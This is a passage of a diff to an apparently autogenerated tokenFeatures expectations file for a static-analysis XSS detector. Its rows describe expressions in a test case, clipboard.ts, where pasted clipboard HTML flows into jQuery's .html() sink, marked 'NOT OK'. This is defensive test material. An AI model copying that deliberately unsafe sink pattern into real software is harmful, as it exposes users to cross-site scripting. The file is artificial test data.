autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | return of anonymous function | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | return of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:37:28:37 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:5 | $ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:5 | $ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:5 | $ | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:5 | $ | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | $("#id") | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | $("#id") | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | $("#id") | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | exceptional return of $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | exceptional return of $("#id") | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | exceptional return of $("#id") | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:12 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:17 | $("#id").html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:17 | $("#id").html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:17 | $("#id").html | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:17 | $("#id").html | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:17 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | $("#id" ... html')) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | $("#id" ... html')) | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | $("#id" ... html')) | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | exceptional return of $("#id" ... html')) | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:5:29:55 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12485,6 +93631,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:7:29:11 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:14:29:17 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:14:29:17 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:14:29:17 | html | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:14:29:17 | html | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:14:29:17 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:19 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:19 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:19 | e | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:19 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:19 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:33 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:33 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:33 | e.clipboardData | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:33 | e.clipboardData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:33 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:41 | e.clipb ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:41 | e.clipb ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:41 | e.clipb ... getData | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:41 | e.clipb ... getData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:41 | e.clipb ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12492,6 +93658,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | exceptional return of e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | exceptional return of e.clipb ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | exceptional return of e.clipb ... /html') | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | exceptional return of e.clipb ... /html') | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:19:29:54 | exceptional return of e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:21:29:33 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:21:29:33 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:21:29:33 | clipboardData | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:21:29:33 | clipboardData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:21:29:33 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:35:29:41 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:35:29:41 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:35:29:41 | getData | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:35:29:41 | getData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:29:35:29:41 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | CalleeFlexibleAccessPath | e.clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12499,21 +93680,97 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:29:43:29:53 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:1 | $ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:1 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | $("#foo") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | exceptional return of $("#foo") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:9 | exceptional return of $("#foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:14 | $("#foo").bind | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:14 | $("#foo").bind | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:32:14 | $("#foo").bind | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | $("#foo ... T OK\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | $("#foo ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | $("#foo ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:1:34:2 | exceptional return of $("#foo ... T OK\\n}) | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:3:32:8 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:3:32:8 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:3:32:8 | "#foo" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:3:32:8 | "#foo" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:3:32:8 | "#foo" | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:11:32:14 | bind | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:11:32:14 | bind | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:11:32:14 | bind | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:16:32:22 | 'paste' | CalleeFlexibleAccessPath | $().bind | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:16:32:22 | 'paste' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:16:32:22 | 'paste' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:16:32:22 | 'paste' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:16:32:22 | 'paste' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | 'arguments' object of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | 'arguments' object of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | 'arguments' object of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | (e) => ... OT OK\\n} | CalleeFlexibleAccessPath | $().bind | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | (e) => ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | (e) => ... OT OK\\n} | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | (e) => ... OT OK\\n} | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | (e) => ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | exceptional return of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | exceptional return of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | return of anonymous function | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | return of anonymous function | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:25:34:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:32:26:32:26 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:5 | $ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:5 | $ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:5 | $ | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:5 | $ | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | $("#id") | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | $("#id") | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | $("#id") | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | exceptional return of $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | exceptional return of $("#id") | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | exceptional return of $("#id") | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:12 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:17 | $("#id").html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:17 | $("#id").html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:17 | $("#id").html | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:17 | $("#id").html | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:17 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | $("#id" ... html')) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | $("#id" ... html')) | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | $("#id" ... html')) | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | exceptional return of $("#id" ... html')) | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:5:33:69 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12521,6 +93778,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | enclosingFunctionName | bind#functionalargument | | autogenerated/Xss/DomBasedXss/clipboard.ts:33:7:33:11 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:14:33:17 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:14:33:17 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:14:33:17 | html | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:14:33:17 | html | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:14:33:17 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:19 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:19 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:19 | e | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:19 | e | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:19 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:33 | e.originalEvent | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:33 | e.originalEvent | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:33 | e.originalEvent | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:33 | e.originalEvent | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:33 | e.originalEvent | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:47 | e.origi ... ardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:47 | e.origi ... ardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:47 | e.origi ... ardData | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:47 | e.origi ... ardData | enclosingFunctionName | bind#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:47 | e.origi ... ardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:55 | e.origi ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:55 | e.origi ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:55 | e.origi ... getData | enclosingFunctionBody | e $ #id html e originalEvent clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:33:19:33:55 | e.origi ... getData | enclosingFunctionName | bind#functionalargument | +| 